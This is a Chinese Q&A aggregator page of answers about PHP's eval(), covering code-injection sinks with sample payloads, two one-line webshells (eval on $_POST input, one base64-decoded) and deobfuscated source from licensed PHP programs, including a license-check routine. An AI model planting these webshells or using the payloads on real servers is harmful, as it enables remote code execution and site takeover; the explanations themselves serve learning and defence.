當前位置:首頁 » 編程語言 » phpeval

phpeval

發布時間: 2022-01-29 00:22:57

㈠ Payload:< php eval('phpinfo();');>可否為php代碼執行

代碼執行漏洞是指應用程序本身過濾不嚴,攻擊者可以通過請求將代碼注入到應用中,最終在web伺服器上去執行。
危險函數執行PHP代碼的有:
eval(), assert(), preg_replace(), call_user_func(), call_user_func_array(), create_function(), array_map()等。
1.eval()和assert()函數本身就可動態執行代碼,其參數就是PHP代碼
payload: <? eval('phpinfo();');?>
2.preg_replace()函數的第一個參數存在e修飾符時,第二個參數和第三個參數可能當作PHP代碼被執行
preg_replace漏洞觸發有兩個前提:

第一個參數需要e標識符,有了它可以執行第二個參數的命令

第一個參數需要在第三個參數中的中有匹配,不然echo會返回第三個參數而不執行命令

//echo preg_replace(『/test/e』, 『phpinfo()』, 『just test』);這樣是可以執行命令的
//echo preg_replace(『/test/e』, 『phpinfo()』, 『just tesxt』); 或者echo preg_replace(『/tesxt/e』, 『phpinfo()』, 『just test』); 這兩種沒有匹配上,所以返回值是第三個參數,不會執行命令
payload:
<?php preg_replace('/
(.∗)
(.∗)
/e','\\1','$_GET['a']);?>
請求1.php?a=[phpinfo()]
3.call_user_func()和array_map()等函數的作用就是調用其他函數,並將第二個參數作為回調函數的參數
payload:
<?php $b='phpinfo()'; call_user_func($_GET['a'],$b);?>
請求1.php?a=assert, 則調用了assert函數

㈡ 網站中出現<php eval($_POST['posha']);> 這段代碼什麼意思

一句話木馬
$_POST['posha']);是獲取post變數
而eval是一個php函數,他可以將字元串中的符合php語法的字元當做php代碼進行執行
假如他在表單域中寫上:unlink('index.php')
然後發送給這個文件,那麼,你的index.php將被刪除

㈢ PHP解密 eval( base64_decode

不錯,回了無數多這種所謂的「解密」帖子,總算看見有人知道怎麼搞了,高興ing
等效的代碼如下:

<?php
class MoleObject extends MasterObject
{

var $FormHandler = null;

var $IoHandler=null;

function MoleObject($config)
{

error_reporting(0);
$this->MasterObject($config);if(18869722 && !defined("LICENSE_VAR_CODE"))exit(86707181);if(substr(md5_FILE("./include/function/global.func.php"),3,25)!=substr("",3,25))
{
error_reporting(0);
ob_clean();
for($s=11677216;$s>0;$s*=65085748){;}
}
$this->FormHandler=new FormHandler;
include_once(LIB_PATH.'io.han.php');
$this->IoHandler=new IoHandler;
$this->Execute();
}

function Execute()
{
switch($this->Code)
{
case 'modify_normal':
include(MOD_PATH.(($_obfuscate_pp3FQ7Ohubz7=2147483647 & -78165835)%27).'/'.$_obfuscate_pp3FQ7Ohubz7.'.php');
break;
case 'domodify_normal':
include(MOD_PATH.(($_obfuscate_shAHJlhD4Ndn=2147483647 & -1818658825)%27).'/'.$_obfuscate_shAHJlhD4Ndn.'.php');
break;
case 'modify_credits':
include(MOD_PATH.(($_obfuscate_2GWWxUEK7ztH=2147483647 & 890135736)%27).'/'.$_obfuscate_2GWWxUEK7ztH.'.php');
break;
case 'domodify_credits':
include(MOD_PATH.(($_obfuscate_JQQuH5KF9jyy=2147483647 & -679717690)%27).'/'.$_obfuscate_JQQuH5KF9jyy.'.php');
break;
case 'modify_header_menu':
$this->ModifyHeaderMenu();
break;
case 'domodify_header_menu':
$this->DoModifyHeaderMenu();
break;
case 'modify_header_sub_menu':
$this->ModifyHeaderSubMenu();
break;
case 'modify_header_sub_menu':
$this->DoModifyHeaderSubMenu();
break;

case 'modify_rewrite':
include(MOD_PATH.(($_obfuscate_r4cRb866G31X=2147483647 & -374888374)%27).'/'.$_obfuscate_r4cRb866G31X.'.php');
break;
case 'domodify_rewrite':
include(MOD_PATH.(($_obfuscate_kFjsOxTxxTm5=2147483647 & 1196688474)%27).'/'.$_obfuscate_kFjsOxTxxTm5.'.php');
break;

case 'modify_remote':
include(MOD_PATH.(($_obfuscate_dmnWYBFfwPZy=2147483647 & -1814999975)%27).'/'.$_obfuscate_dmnWYBFfwPZy.'.php');
break;
case 'domodify_remote':
include(MOD_PATH.(($_obfuscate_M9T56w4hBGsk=2147483647 & 332943561)%27).'/'.$_obfuscate_M9T56w4hBGsk.'.php');
break;

case 'modify_filter':
include(MOD_PATH.(($_obfuscate_gWUtSmmgjtIp=2147483647 & -962910372)%27).'/'.$_obfuscate_gWUtSmmgjtIp.'.php');
break;
case 'domodify_filter':
include(MOD_PATH.(($_obfuscate_robepjimEUCI=2147483647 & -659464081)%27).'/'.$_obfuscate_robepjimEUCI.'.php');
break;

case 'modify_latest_search':
$this->ModifyLatestSearch();
break;
case 'domodify_latest_search':
$this->DoModifyLatestSearch();
break;
case 'modify_access':
include(MOD_PATH.(($_obfuscate_RFZWBU9N2FLm=2147483647 & 975168040)%27).'/'.$_obfuscate_RFZWBU9N2FLm.'.php');
break;
case 'domodify_access':
include(MOD_PATH.(($_obfuscate_Ig1RqxiYeBex=2147483647 & 1791127976)%27).'/'.$_obfuscate_Ig1RqxiYeBex.'.php');
break;

case 'modify_seccode':
include(MOD_PATH.(($_obfuscate_yNun8HVOF41M=2147483647 & -1132193474)%27).'/'.$_obfuscate_yNun8HVOF41M.'.php');
break;
case 'do_modify_seccode':
include(MOD_PATH.(($_obfuscate_RqGJmKOedTlZ=2147483647 & 305153614)%27).'/'.$_obfuscate_RqGJmKOedTlZ.'.php');
break;

case 'modify_smtp':
include(MOD_PATH.(($_obfuscate_GZvqIIYIxcwR=2147483647 & -2091071938)%27).'/'.$_obfuscate_GZvqIIYIxcwR.'.php');
break;
case 'do_modify_smtp':
include(MOD_PATH.(($_obfuscate_eUDxyTQSnmWA=2147483647 & -25441582)%27).'/'.$_obfuscate_eUDxyTQSnmWA.'.php');
break;

case 'modify_right':
include(MOD_PATH.(($_obfuscate_L6pnR8LaKmYu=2147483647 & -29905623)%27).'/'.$_obfuscate_L6pnR8LaKmYu.'.php');
break;
case 'do_modify_right':
include(MOD_PATH.(($_obfuscate_umtTsFNTDQ2i=2147483647 & -1934952338)%27).'/'.$_obfuscate_umtTsFNTDQ2i.'.php');
break;

case 'modify_shortcut':
include(MOD_PATH.(($_obfuscate_Po7xayJ0iz3x=2147483647 & -371519643)%27).'/'.$_obfuscate_Po7xayJ0iz3x.'.php');
break;
case 'do_modify_shortcut':
include(MOD_PATH.(($_obfuscate_cFcMlzVkWpGo=2147483647 & 1925297631)%27).'/'.$_obfuscate_cFcMlzVkWpGo.'.php');
break;

default:
include(MOD_PATH.(($_obfuscate_pp3FQ7Ohubz7=2147483647 & -78165835)%27).'/'.$_obfuscate_pp3FQ7Ohubz7.'.php');
break;
}
}

function _saveRewriteConfig($domain,$name,$config)
{
return include(MOD_PATH.(($_obfuscate_OeWNnsry3PMy=2147483647 & -1082551710)%27).'/'.$_obfuscate_OeWNnsry3PMy.'.php');
}
function _writeHtaccess($abs_path)
{
return include(MOD_PATH.(($_obfuscate_x8rztwAyS8f1=2147483647 & -315296549)%27).'/'.$_obfuscate_x8rztwAyS8f1.'.php');
}

}
?>

注意看13行,這里其實是在檢測另外的文件是否被解密,注意是否有其它文件類似的辦法來檢測你這個程序。

㈣ php eval(gzinflate(base64_decode

把eval換為echo,運行一下就能現實解密後的內容。你壓縮包裡面的1.txt文件解密後的內容如下:

<?php
require "../include/function.php";
chkuser();
if(isset($_GET['Page']))
{
$page=$_GET['Page'];
}
else
{
$page="1";
}
if(isset($_GET['kind']))
{
$kind=$_GET['kind'];
}
else
{
$kind="task";
}

?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML
xmlns="http://www.w3.org/1999/xhtml"><HEAD><TITLE>任務管理-<?php echo $site_tit; ?></TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content=<?php echo $site_des; ?> name=description>
<META content=<?php echo $site_key; ?> name=keywords>
<?php
require_once "../head1.php";
?>
<script>
function link(o)
{
var link1=document.getElementById("link"+o);
clipboardData.setData('Text',link1.value);
alert("寶貝地址已經復制到剪貼板中,\n請打開一個新的瀏覽窗口,\n把地址粘貼到瀏覽器的地址欄中您就可以訪問此寶貝了!");
window.open();
}
</script>
<META content="MSHTML 6.00.2900.3429" name=GENERATOR></HEAD>
<BODY class=FullWidth>

<DIV class=main>
<DIV class=sell_new>

<DIV class=sell_left>
<div style="width:100%;background:#fff;text-align:center">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="15"></td>
<td height="15"></td>
</tr>
<tr>
<td></td>
<td><div id="nltit">您的位置: <a href="/index.html">首頁</a> >> 任務管理 >>
<?php
if($kind=="task"){echo "我發布的任務";}
else {echo "我接手的任務";}
?>
</div>
<div style="margin-top:10px;width:650px">
<table width="95%" border="0" cellspacing="0" cellpadding="0">
<tr align="left">
<td height="25" colspan="8" style="border-bottom:1px dotted #ccc">任務分類:
<a href="task_list.php"><font color="#000000">我發布的任務</font></a> |
<a href="task_list.php?kind=witkey"><font color="#000000">我接手的任務</font></a>
</td>
</tr>
<tr align="center">
<td height="25">任務編號</td>
<td bgcolor="#efefef">發布用戶</td>
<td height="25">寶貝地址</td>
<td height="25" bgcolor="#efefef">到期時間</td>
<td height="25">接手用戶</td>
<td height="25" bgcolor="#efefef">任務來自</td>
<td>任務保證金</td>
<td bgcolor="#efefef">任務狀態</td>
</tr>
<?php
$pagenum=15;
if($kind=="task"){
$sql="select top ".$pagenum." * from task_list where id not in(select Top ".strval($pagenum*($page-1))." id from task_list where taskuser='".$_SESSION['szuser']."') and taskuser='".$_SESSION['szuser']."'";
$rs=mssql_query($sql);
$all=execonn("select count(id) from task_list where taskuser='".$_SESSION['szuser']."'");
$pageacount= ceil($all/$pagenum);
}
if($kind=="witkey"){
$sql="select top ".$pagenum." * from task_list where id not in(select Top ".strval($pagenum*($page-1))." id from task_list where taskeruser='".$_SESSION['szuser']."') and taskeruser='".$_SESSION['szuser']."'";
$rs=mssql_query($sql);
$all=execonn("select count(id) from task_list where taskeruser='".$_SESSION['szuser']."'");
$pageacount= ceil($all/$pagenum);
}
while($row=mssql_fetch_array($rs))
{
?>
<tr align="center">
<td height="25"><a href="viewtask.php?tid=<?php echo $row['id']; ?>" target="_blank" title="點擊查看任務詳情"><?php echo $row['taskno']; ?></a></td>
<td bgcolor="#efefef"><a href="viewuser.php?uid=<?php echo $row['taskuser']; ?>" target="_blank" title="點擊查看用戶資料"><?php echo $row['taskuser']; ?></a></td>
<td height="25"><a href="#" onclick="link('<?php echo $row['id']; ?>');"><font color="#FF0000">點擊這里</font></a>
<input name="link<?php echo $row['id']; ?>" type="hidden" value="<?php echo $row['shopurl']; ?>">
</td>
<td height="25" bgcolor="#efefef"><?php echo $row['enddate']; ?></td>
<td height="25"><a href="viewuser.php?uid=<?php echo $row['taskeruser']; ?>" target="_blank" title="點擊查看用戶資料"><?php echo $row['taskeruser']; ?></a></td>
<td height="25" bgcolor="#efefef"><?php echo $row['taskfrom']; ?></td>
<td><?php echo $row['taskmoney']; ?>元</td>
<td bgcolor="#efefef"><a href="viewtask.php?tid=<?php echo $row['id']; ?>" target="_blank" title="點擊查看任務詳情">
<?php if($kind=="task"){ ?>
<?php echo getstat2($row['taskstat'],0); ?>
<?php }
else { ?>
<?php echo getstat2($row['taskstat'],1); ?>
<?php } ?>
</a></td>
</tr>
<?php } ?>
<tr align="center">
<td height="25" colspan="8">
<?php
$outstr="";
$outstr.="共".$pageacount."頁 ";
$p1=intval($page);
$p2=intval($pageacount);
if($page=="1")
{
$outstr=$outstr."首頁 上一頁";
}
else
{
$outstr=$outstr."<a href=task_list.php?kind=".$kind."&Page=1>首頁</a> <a href=task_list.php?kind=".$kind."&Page=".strval($p1-1).">上一頁</a>";
}
for($i=1;$i<=$p2;$i++)
{
$outstr=$outstr." <a href=task_list.php?kind=".$kind."&Page=".$i.">".$i."</a> ";
}
if(strval($page)==strval($pageacount))
{
$outstr=$outstr."下一頁 末頁";
}
else {
$outstr=$outstr."<a href=task_list.php?kind=".$kind."&Page=".strval($p1+1).">下一頁</a> <a href=task_list.php?kind=".$kind."&Page=".strval($p2).">末頁</a>";
}
echo $outstr;
?>
</td>
</tr>
</table>
</div>
</td>

</tr>
</table><br><br>
</div>
<I class="sell_left_angle sell_left_tl"></I><I
class="sell_left_angle sell_left_tr"></I><I
class="sell_left_angle sell_left_bl"></I><I
class="sell_left_angle sell_left_br"></I> </DIV>

<?php
require_once "right.php";
require_once "../foot.php";
mssql_close();

?>
</BODY></HTML>

㈤ php eval()

你這樣理解

括弧里$前面加入\是為了「轉譯」,這樣的話$str就不會變成真實的字元串

eval ("\$str = \"$str\";"); 等同於 $str = "This is a $string with my $name in it.<br>"; 等同於 $str = "This is a cup with my coffee in it.<br>";

㈥ php eval怎樣執行系統命令

eval — 把字元串作為PHP代碼執行

說明

mixedeval( string $code_str )

把字元串code_str作為PHP代碼執行。 除了其他,該函數能夠執行儲存於資料庫文本欄位內的PHP代碼。

使用eval()時需注意幾個因素:注意字元必須是有效的PHP代碼,包括結尾的分號,以不至於解釋器在eval()之後退出。並且正確地轉義code_str中的東西。你可以使用一個PHP閉合標簽來混合輸出HTML和PHP代碼。

同時需注意eval中的變數會被保留在之後的主腳本中。

參數

code_str需要被執行的字元串code_str不能包含 PHP Opening tags。

return語句會立即中止當前字元串的執行。

返回值

eval()返回NULL,除非在執行的代碼中return了一個值,函數返回該值。 如果在執行的代碼中有一個解析錯誤,eval()返回FALSE,之後的代碼將正常執行。無法使用 set_error_handler() 捕獲eval()中的解析錯誤。

範例

Example #1eval()例子 - 簡單的文本合並

<?php

$string = 'cup';

$name = 'coffee';

$str = 'This is a $string with my $name in it.';

echo $str. "\n";

eval("\$str = \"$str\";");

echo $str. "\n";

?>

以上常式會輸出:

This is a $string with my $name in it.This is a cup with my coffee in it.

Note: 因為是一個語言構造器而不是一個函數,不能被 可變函數 調用。

Tip和直接將結果輸出到瀏覽器一樣,可使用輸出控制函數來捕獲當前函數的輸出,然後(例如)保存到一個 string 中。

Note:

如果在執行的代碼中產生了一個致命的錯誤(fatal error),整個腳本會退出。
Linux 中
shell中的eval命令將會首先掃描命令行進行所有的替換,然後再執行命令。該命令使用於那些一次掃描無法實現其功能的變數。該命令對變數進行兩次掃描。這些需要進行兩次掃描的變數有時候被稱為復雜變數。

例如

$:cat ext

count=3

cmd=echo

cmd="$cmd \$$count"

ext 11 22 33

此時cmd=" echo $3"

eval $cmd 等價於 "echo 33 "

㈦ 這句怎麼解`就一句 <php eval (base64_decode($_POST["php"]));>

將post方式提交的變數$_POST['php']使用base64_decode()進行解碼($_POST['php']應該是MIME base64 編碼格式),並將解碼之後的變數按照PHP語句的方式運行

㈧ 關於php的eval()'d code LINE: 1問題

$result2=eval("$Image::thumb($logo_path,$newpath2,'',130,130);");

貌似多了一個分號

$result2=eval("$Image::thumb($logo_path,$newpath2,'',130,130)");

㈨ PHP eval 傳入的參數是變數 怎麼處理轉義

eval()將傳出入的字元串先當php語句來處理的

<?php
$str='echo"hello";';//這里是單引號引起語句,使用雙引號注意字元被轉義的問題
$content=eval($str);//類似於給裡面的話加了<?php?>
//eval($str)相當於<?phpecho"hello";?>
//執行結果:hello而不是echo"hello";
?>
熱點內容
危化品的存儲 發布:2024-03-28 23:02:09 瀏覽:608
qq重新設密碼怎麼設置 發布:2024-03-28 22:49:05 瀏覽:89
深圳航天信息稅盤伺服器地址 發布:2024-03-28 22:47:51 瀏覽:204
玩csol伺服器連接中斷怎麼辦 發布:2024-03-28 22:46:19 瀏覽:906
apk加密軟體 發布:2024-03-28 22:36:14 瀏覽:696
cpu不能直接訪問的存儲器 發布:2024-03-28 22:31:49 瀏覽:441
嘀嘀打車源碼 發布:2024-03-28 22:26:02 瀏覽:935
資料庫脆弱點 發布:2024-03-28 22:25:06 瀏覽:801
2021款es升級了哪些配置 發布:2024-03-28 21:26:44 瀏覽:384
下述調度演算法 發布:2024-03-28 21:22:24 瀏覽:616